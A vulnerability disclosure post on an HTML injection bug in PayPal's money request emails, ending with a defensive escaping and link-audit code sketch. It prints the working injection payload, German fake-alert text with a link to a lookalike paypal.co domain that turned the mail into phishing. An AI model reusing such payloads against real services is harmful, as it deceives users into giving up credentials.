phishing with html

TL;DR: HTML injection within money request mail leads to phish.

I recently found an HTML injection vulnerability within PayPal's money request function.

I was able to inject HTML code into a money request mail sent from PayPal
to a victim user and turned it into a neat phishing mail.

injection point

keine<br><br><b>Hinweise von Paypal<br>Achtung!!</b> Dein Kontostand ist <b>negativ.<br><A HREF="http://www.user.paypal.co/m/view?=invorce-134-2-41">Jetzt handeln!</A><br>Dein Paypal Team.

The phishing mail sent through PayPal.

Timeline:

  • 20.01.2015 vulnerability discovered
  • 22.01.2015 bug reported to PayPal
  • 26.01.2015 PayPal confirmed the issue
  • 28.01.2015 fix and reward
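
The usual fix for this class of bug is to HTML-encode user-controlled text before it goes into the mail body. The sketch below is an added example, not PayPal's code: the template, field names, allowlist and the placeholder domains are assumptions, and the sample note is constructed to resemble the payload above. It renders the mail both ways and audits which links a mail client would actually parse.

```python
import html
from html.parser import HTMLParser

# Hypothetical mail template; the real one is not shown in this post.
TEMPLATE = (
    "<html><body><p>{sender} requests {amount} from you.</p>"
    "<p>Note: {note}</p>"
    '<p><a href="https://payments.example.invalid/requests">View request</a></p>'
    "</body></html>"
)
# Links the template itself is allowed to contain (assumed allowlist).
ALLOWED_HREFS = {"https://payments.example.invalid/requests"}
# Constructed sample note modelled on the payload above (placeholder domain).
SAMPLE_NOTE = (
    "none<br><br><b>Notice</b> Your balance is <b>negative.</b><br>"
    '<a href="http://phish.example.invalid/view">Act now!</a>'
)

def render_unsafe(sender, amount, note):
    """Vulnerable: the user-controlled note is placed in the HTML as-is."""
    return TEMPLATE.format(sender=sender, amount=amount, note=note)

def render_safe(sender, amount, note):
    """Hardened: every user-controlled value is HTML-encoded first."""
    return TEMPLATE.format(
        sender=html.escape(sender, quote=True),
        amount=html.escape(amount, quote=True),
        note=html.escape(note, quote=True),
    )

class LinkAudit(HTMLParser):
    """Records the tags and link targets parsed out of a rendered mail."""
    def __init__(self):
        super().__init__()
        self.tags, self.hrefs = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "a":
            self.hrefs.extend(v for k, v in attrs if k == "href" and v)

def audit(mail_html):
    parser = LinkAudit()
    parser.feed(mail_html)
    parser.close()
    return parser

def unexpected_links(mail_html):
    """Regression check: links in the mail that the template did not add."""
    return [h for h in audit(mail_html).hrefs if h not in ALLOWED_HREFS]
```

Running unexpected_links() over rendered mails in a test suite catches a template that starts passing markup through again.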